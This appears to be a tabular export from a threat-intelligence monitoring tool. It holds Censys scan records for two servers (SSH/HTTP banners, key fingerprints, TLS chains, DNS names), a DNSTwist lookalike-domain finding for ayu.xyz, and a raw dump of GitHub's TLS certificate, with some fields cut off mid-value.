| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayu.xyz | ayhu.xyz |
| 2023-05-12 02:44:23 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
